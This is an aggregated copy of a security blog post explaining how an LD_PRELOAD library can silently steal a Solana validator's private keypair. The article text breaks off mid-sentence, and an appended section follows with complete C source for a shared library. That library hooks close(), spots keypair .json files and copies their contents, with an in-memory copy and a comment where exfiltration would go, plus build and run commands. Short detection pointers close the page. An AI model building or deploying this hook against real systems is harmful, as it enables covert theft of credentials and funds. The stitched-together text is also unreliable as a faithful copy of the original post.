Ld_preload, the Invisible Key Theft

https://news.ycombinator.com/rss Hits: 2
Summary

Imagine you are running a Solana validator. Your EDR agent is running, everything is set up, and you think you are safe. Then you discover that your wallet has been drained and you don't know why. You start to investigate and see that only the validator accessed your private keys, nothing else. You check the directory's permissions and the EDR logs, and everything seems to be in order.

The Threat

LD_PRELOAD is an environment variable that tells the dynamic loader (ld.so) to load a shared library into a process before the program's own code starts. Because symbols in that library are resolved ahead of glibc's, it can hook library calls such as open() and close() and intercept file operations before glibc's implementation runs. Related variables such as LD_LIBRARY_PATH can be abused in a similar way, and the mechanism is not limited to environment variables: /etc/ld.so.preload loads a shared library into every dynamically linked process on the system (it requires root to write, and unlike LD_PRELOAD it is honored even for set-user-ID programs, for which the loader restricts environment-driven preloading). The loader provides this feature so that developers can debug and test their code by swapping in instrumented libraries. Our implementation of this exploitation code is in our Github Repo.

Why Solana?

This is not just a Solana problem. It affects any application that loads credentials from a file. The insider threat is real and a problem for any organization; this is simply another way to steal private keys, and there is too much at stake not to be careful.

The Vulnerability

Most of us write userspace applications and rely on libraries like glibc to handle file operations, so we never really think about this issue. glibc does the heavy lifting for us, but what if something hooks those file operations and intercepts them before glibc does its work? That is exactly what LD_PRELOAD allows: a way to hook into a library call. In our case we wrote a malicious shared library that hooks the file operations. When the validator read its keypair files from disk, we intercepted the close() call and made a copy of the file before the file descriptor closed. Nothing in the filesystem permissions or in the validator's own behavior looks wrong, because the copy is made inside the validator process by the validator's own file descriptor.
We also call the rea...
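The close() hook described above, as an added example written for this page (it is not the authors' repository code). It assumes the target's keypair is a ".json" file (the Solana CLI stores keypairs as a JSON byte array) and uses Linux's /proc/self/fd to recover the path behind a descriptor, so no open() hook is needed; the pass-through uses the raw close syscall rather than dlsym(RTLD_NEXT, "close"), which behaves the same and cannot recurse into the hook. ldp_simulate_victim() and the fake keypair contents are constructed stand-ins for the validator:

```c
// keythief.c: added example (not the original post's repo code) of an
// LD_PRELOAD library that interposes close(2) and copies the file being
// closed when its name suggests a keypair. Build as a shared object:
//   gcc -shared -fPIC -O2 -o keythief.so keythief.c
//   LD_PRELOAD=./keythief.so ./victim
// Compiled as a normal program it runs the self-test in main().
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

#define CAPTURE_MAX 4096

static char g_last_path[PATH_MAX];
static char g_last_data[CAPTURE_MAX + 1];
static int  g_captures;

/* Assumption used as the filter: the keypair lives in a ".json" file. */
static int looks_like_keypair(const char *path)
{
    size_t n = strlen(path);
    return n > 5 && strcmp(path + n - 5, ".json") == 0;
}

/* Interposed close(2). This definition shadows glibc's, so every close()
   the victim makes lands here first. */
int close(int fd)
{
    char link[64], path[PATH_MAX];

    snprintf(link, sizeof link, "/proc/self/fd/%d", fd);
    ssize_t n = readlink(link, path, sizeof path - 1);   /* Linux-only */
    if (n > 0) {
        path[n] = '\0';
        if (looks_like_keypair(path)) {
            /* pread() does not move the file offset, so the victim's own
               reads are unaffected. It fails on write-only descriptors. */
            ssize_t got = pread(fd, g_last_data, CAPTURE_MAX, 0);
            if (got > 0) {
                g_last_data[got] = '\0';
                snprintf(g_last_path, sizeof g_last_path, "%s", path);
                g_captures++;
                /* A real implant would exfiltrate here; this example only
                   keeps the copy in memory so the self-test can inspect it. */
            }
        }
    }
    /* Pass through with the raw syscall: same effect as the real close(). */
    return (int)syscall(SYS_close, fd);
}

const char *ldp_last_capture(void)  { return g_last_data; }
const char *ldp_last_path(void)     { return g_last_path; }
int         ldp_capture_count(void) { return g_captures; }

/* Constructed stand-in for the validator: write a fake keypair file, then
   read it back the way a normal program would. Returns 0 on success. */
int ldp_simulate_victim(const char *path, const char *keypair_json)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) return -1;
    if (write(fd, keypair_json, strlen(keypair_json)) < 0) { close(fd); return -1; }
    close(fd);                       /* write-only fd: pread fails, no capture */

    char buf[CAPTURE_MAX];
    fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    ssize_t r = read(fd, buf, sizeof buf);
    close(fd);                       /* readable fd: the hook copies the file */
    unlink(path);
    return r < 0 ? -1 : 0;
}

int main(void)
{
    const char *fake = "[12,34,56,78,90,11,22,33]";  /* constructed, not a real key */
    if (ldp_simulate_victim("/tmp/ldp_demo_keypair.json", fake) != 0) return 1;
    printf("captures=%d path=%s data=%s\n",
           ldp_capture_count(), ldp_last_path(), ldp_last_capture());
    return 0;
}
```

Because the copy is taken through the victim's already-open descriptor, file permissions, ownership and access logs all attribute the read to the validator itself, which is why the scenario in the summary shows nothing but the validator touching the key. The places to look are the process environment (/proc/PID/environ for LD_PRELOAD), its loaded objects (/proc/PID/maps) and /etc/ld.so.preload.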

First seen: 2025-10-16 16:49

Last seen: 2025-10-16 17:49